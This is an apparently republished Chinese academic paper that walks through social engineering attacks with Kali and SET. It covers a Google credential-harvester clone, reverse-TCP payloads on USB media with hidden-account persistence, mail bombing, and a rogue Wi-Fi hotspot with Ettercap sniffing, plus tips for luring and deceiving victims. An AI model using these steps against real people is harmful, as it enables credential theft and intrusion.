APP下载

社会工程学的攻击原理及其实现方式

2020-07-27高小辉

中阿科技论坛(中英阿文) 2020年6期
关键词:网络信息安全

摘要:随着软硬件的快速发展,人本在享受物联网带来的简易生活时,同时人的信息安全和财产安全变得更加重要,了解网络中的攻击手段就显得更为重要,论文基于对社会工程学的攻击原理進行分析,采取实践应用方法,将其攻击流程和手段展示出来,最终目的是为保护信息安全提供基本依据和启发。重点介绍了四种生活中普遍见到的社会工程学攻击方式,并通过kalix操作系统和setoolkit攻击套件进行实践,给出攻击方式的理念和方式,并展现其攻击的多样化。

关键词:社会工程学攻击;kali;栈溢出漏洞;网络信息安全

中图分类号:D918;TP393.08            文献标识码:A

收稿日期:2020-05-22

作者简介:高小辉(1997-),男,本科,研究方向:信息安全和算法分析。

通过介绍5种社会工程学攻击方式:鱼叉攻击,钓鱼攻击,恶意媒介攻击,群邮攻击,展现各自的原理和独特的实验过程,对社会工程学和心理学的共同研究,展现不同的攻击方式,向网络安全人员提供参考,有助于实现信息安全的靶向治疗。

1社会工程学的由来与发展

凯文.米特尼克是被认为社会工程学的奠基人好,他成功的将心理学融入其中,利用网民的社会行为和心里将其弱点暴露出来,让一些技术探测工具有机可乘。

现代社会工程学与心理学能融合进一步加深,基于此一系列衍生工具和技术,采用最基本的攻击方式,攻击者洞悉网民心理弱点,并利用心理弱点,继而一些让网民遭受巨大财产损失。

2社会工程学攻击方式

2.1猎奇心理和鱼叉式攻击

当人们遇到不知道,不熟悉或比较奇异的事物,常会不加思考的去接触此类事物,而截取被攻击的信息则是利用猎奇心理和较低的防患意识,当人去浏览网页和这下载文件,攻击者事先利用人的猎奇心理,可以对文件名使用关于黄色,赚取巨额利润等字眼或者利用当下热点新闻,使被攻击者主动下载危险附件。危险附件的制作是基于栈溢出漏洞,由被攻击者提前制作好或者直接利用被攻击者系统本身自带的栈溢出漏洞,这里首先介绍栈溢出漏洞原理和怎样利用window XP存在的栈溢出漏洞程序来控制被攻击机。

栈漏洞溢出是指在栈内写入超出长度的限制数据,同时利用缓冲器溢出改写数据和执行流程,从而破坏程序的运行,获得系统控制权的攻击手段,这里涉及主要三个寄存器ESP ESP 和EIP.栈指针寄存器(extended stack pointer),其内存放着一个指针,该指针永远指向系统栈最上面一个栈帧的栈顶,基址指针寄存器(extended base pointer),其内存放着一个指针,该指针永远指向系统栈最上面一个栈帧的底部,EIP寄存器,用来存储CPU要读取指令的地址,CPU通过EIP寄存器读取即将要执行的指令。每次CPU执行完相应的汇编指令之后,EIP寄存器的值就会增加,如表1所示。

上述步骤生成了一个内部含有攻击代码指令的文件,将其发布到网上,在这里攻击对象是有Xp用户下载,当用户下载完毕并打开时候,kali应当事先开启主机进行监测。启动配套使用工具msfdb数据库,并进入msfconsole控制台,然后使用句柄设置载荷模块,指定攻击机的IP和端口,若成功建起攻击机和被攻击机的会话,可使用meterpreter模块来获得被攻击机的系统控制权,例如使用screenshot获得被控制机的当前屏幕的截图,使用keycan_start和key_scan_dump获取被控制机的键盘输入记录。另外还可以使用hashdump来获得密码的hash值,借助于Johnny进行哈希值的破解或者下载彩虹表进行攻击,来取得被攻击机的系统密码。

2.2.钓鱼攻击

钓鱼攻击利用伪造的知名机构来窃取账户名及其密码,利用登陆者的行为惯性和盲目信任。在kali中setoolkit社会工程学中有完整的伪造知名网站的能力,现以主机A(A为公网ip)作为窃取主机,并在此主机上伪造www.google.com进而获取登陆者的密码和账户。

启动setoolkit后,

第一步:选择社会工程学攻击,选定Social-Engineering Attacks;

第二步:选择站点攻击,选择Website Attack Vectors;

第三步:选择机密信息攻击,站点克隆,选择Credential Harvester Attack Method,选择Site Cloner

Enter the url to clone:http://www.google.com

//这里我们选择谷歌网站

第四步:配置监听主机。

IP address for the POST back in Harvester/Tabnabbing :xxx.xxx.xx.xx

当上述工作完成后,登陆者使用A登录的时候,监听主机将获得此登陆者的用户名和密码,如下图所示:

钓鱼攻击的核心问题:如何使登陆者跳转到一个自己不认识公网IP?这决定了钓鱼攻击的成败。现提出如下解决办法:(1)对公网IP申请大量相似域名,进行公网IP和域名的绑定,这类方法较为耗费财力和人力进行维护,可以称之为撒网式钓鱼。(2)购买大量网站流量,来获得较高的曝光率,有意的进行引流,从而在检索排名靠前,可以称之为紧缩网口。(3)欺诈邮箱,自动将自己主机相似域名大量转发,适合定向捞鱼。(4)以超链接的方式,src属性转向自己的公网IP,而文本内容却是你伪造的网站地址。

2.3.创造恶意传播媒介

将创造的恶意媒介,利用U盘或附加文件的形式下载到被攻击机上,创造的恶意媒主动向监听机建立一个会话,使用Meterpreter创造出的攻击载荷返回一个控制通道。另外防止被攻击机进行漏洞处理,可以采用创建影子账户,或者创建隐藏账户来进行权限维持。

利用setoolkit实现方式:

第一步:选择社会工程学攻击。

选择Social-Engineering Attacks

第二步:选择创造恶意媒介,选择逆向tcp连接,选择Windows Shell Reverse_TCP

设置监听账户:IP address for payload listener:xxx.xxx.xx.xx。

第三步:将生成的payload.exe,autorun等文件进行伪装,发布到被攻击的主机上。

生成文件如下图所示:

第四步:在被攻击机主动或被动运行恶意媒介,攻击机获得被攻击的控制权,为防止漏洞处理,进行创建影子账户,分配最高权限。

添加账户:net user username password add。

一个关键核心问题,怎么伪装或隐藏载荷文件,较好的方法:(1)利用当下热点新闻,利用网民的从众心理,进行扩散式传播文件。(2)伪装成正常图标,进行发布。发布的网站一般是不正规网站,但是持有大量流量,利用网民的占有欲望,麻木警觉。

2.4.群发邮件攻击

大规模邮件攻击是一种社会工程攻击,其中大量的邮件是发送给受害者,以填满其电子邮件收件箱和崩溃受害者的邮箱。 当一封重要邮件到达受害者设备,而受害者并不知道这一点时,攻击者发送大量的垃圾邮件, 如果收件箱没有崩溃,垃圾邮件的发送量是如此之大,以至于重要的邮件隐藏在垃圾邮件中。 它也被称为电子轰炸和短信攻击。

实现方式:

第一步:选择社会工程学攻击,选择Social-Engineering Attacks;

第二步:选择群发邮件攻击,生成邮件账户单。选择Mass Mailer Attack,导入邮件账户单,选择E-mail Attack Mass Mailer,导入路径Path to the file to import into SET: /xx/xx/file;

第三步:設置私人个人账户作为发送邮件的账户。

Use a gamil Account for your email attack

Your gmail email address:xxx@.com

Flag this message/s as high priority?Yes

#设置邮件优先权为高

Do you want to attach a file - [y/n]: n

Do you want to attach an inline file - [y/n]: n

#这里我们选择不添加附件,这里的附件经常与病毒文件混合在一起,这里我们只是实现群邮攻击

Email subject:xxx

Send the message as html or plain? 'h' or 'p' [p]:p

nter the body of the message, type END (capitals) when finished:xxx

Next line of the body: END

#设置文件主题和内容

第四步:测试群邮攻击。

被攻击账户邮件如图,攻击次数295次:

2.5 无线接入点引导攻击

此类攻击方式利用通过伪装的wifi热点,通常采用免费方式接入,引导人们接入wifi,当用户一旦接入,攻击者便可截取一些私密信息,它的实现方式主要依赖于Kali系统三大工具,Airbase-ng,DHCP-server和Ettercap,Airbase-ng主要用于攻击客户端,例如,用于在无线接口上启用和禁用监听模式,DHCP-SERVER用于给接入者分配IP,Ettercap用于嗅探数据,进行中间人攻击,在实践中发现,使用功率更大的无线网卡成功几率更高,地点一般选择比较繁华场所,热点名称应具有诱惑性和迷惑性。

实现方式:

安装主要服务套件 :

安装dhcp读取:sudo apt-get install isc-dhcp-server

对isc-dhcp-server服务器进行基本配置:

配置方面主要涉及子网配置,DHCP和路由配置:

nano -w /etc/dhcp/dhcpd.conf

Default-lease-time 600;

#设置默认租约

max-lease-time 7200;

#设置最大租约

Ddns-update-style none

Authoritative;

#设置dhcp服务器为权威

Subet 192.168.1.0 netmask 255.255.255.0{

Range 192.168.1.3 192.168.140;

#配置分配ip范围

Option domain-name-servers 192.168.1.1;

#配置dhcp服務器的ip地址

Option domain-name  “example.org”

Option routers 192.168.1.1;

#设置路由ip,这里保持和dhcp一致。

Option subnet-mask 255.255.255.0;

}

3对外载网卡启用监听模式,这里使用Ralink 802.11 n WLAN

在启用前使用检查airmon是否已经开启,避免冲突,这里直接检查后直杀死进程

airmon-ng  check

Found 2 processes that could cause trouble.

Kill them using 'airmon-ng check kill' before putting

the card in monitor mode, they will interfere by changing channels

and sometimes putting the interface back in managed mode

PID Name

672 NetworkManager

1300 wpa_supplicant

airmon-ng  check kill

Killing these processes

PID Name

_supplicant

4配置桥接网络

将wifi热点广播,转发到内核网络主要配置如下:

sudo ifconfig at0 192.168.1.1 netmask 255.255.255.0

#设置有线接口卡at0,并且绑定到路由器

sudo ifconfig at0 mtu 1400

#设置接收的数据块大小,不能太小,否则接收异常

sudo route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

#将路由添加到路由表上

sudo sh -c 'sudo echo 1 > /proc/sys/net/ipv4/ip_forward'

#设置ipv4转发

sudo iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.43.1

#配置网关路由

sudo iptables -P FORWARD ACCEPT

sudo iptables --append FORWARD --in-interface at0 -j ACCEPT

sudo iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

#注意这里设置外部连接网络eth0,这一步有利于实现更加真实的欺骗,比如接入者不受感受到网络的异常

sudo dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0

5查看欺骗wifi,并行行测试

手机客户端扫描的wifi如图所示,可以看到example.org

当连接example.org wifi时,数据的劫持如图所示。

5结语

社会工程学的攻击方式与心理学的使用存在彼此关联和联系,从上述列举了典型的社会工程学攻击方式及其实现方式,社会工程学攻击的实现的较为容易,但是一些杀毒软件的防护愈发严格,漏斗补丁发布愈加频繁,这对社会工程学的攻击方式产生了较大的不利影响,但是从另一方面看,社会工程学的攻击攻击理念也在不断改变,从技术和工具支持,转向偏人的行为研究,并以此为基础,发展新的社会工程学攻击技术和工具。

参考文献:

[1]米特尼克,西蒙.反欺骗的艺术[M]..北京:清华大学出版社,2014.

[2]李华峰.Kali Linux 2网络渗透测试实践指南[M],北京:人民邮电出版社,2008.

[3]詹姆斯.F.庫罗斯.计算机网络自顶向下方法[M].北京:机械工业出版社,2018.

Abstract: With the rapid development of software and hardware, when people are enjoying the simple life brought by the Internet of Things, at the same time, peoples information security and property security become more important, and it is more important to understand the attack methods in the network. The paper is based on It analyzes the attack principle of social engineering, adopts a practical application method, and displays its attack process and means. The ultimate goal is to provide basic basis and inspiration for protecting information security. It focuses on the four social engineering attack methods that are commonly seen in life, and is practiced through the kalix operating system and setoolkit attack suite. The concepts and methods of the attack methods are given, and the diversity of their attacks is demonstrated.

Key words: Social engineering attack; Kali; Stack overflow vulnerability; Network information security

猜你喜欢

网络信息安全
基于云计算背景的网络信息安全技术以及未来发展
计算机网络信息安全与防护策略研究
现代计算机网络信息安全技术及网络安全策略
互联网+时代下的网络信息安全挑战与思考
计算机网络信息安全与其防护体系设计
《网络信息安全》课程教学改革与探索
虚拟专用网络技术在计算机网络信息安全中的应用探讨
互联网金融的风险分析与管理
计算机网络信息安全及防护策略刍议
电网企业网络信息安全的威胁与攻防新技术研究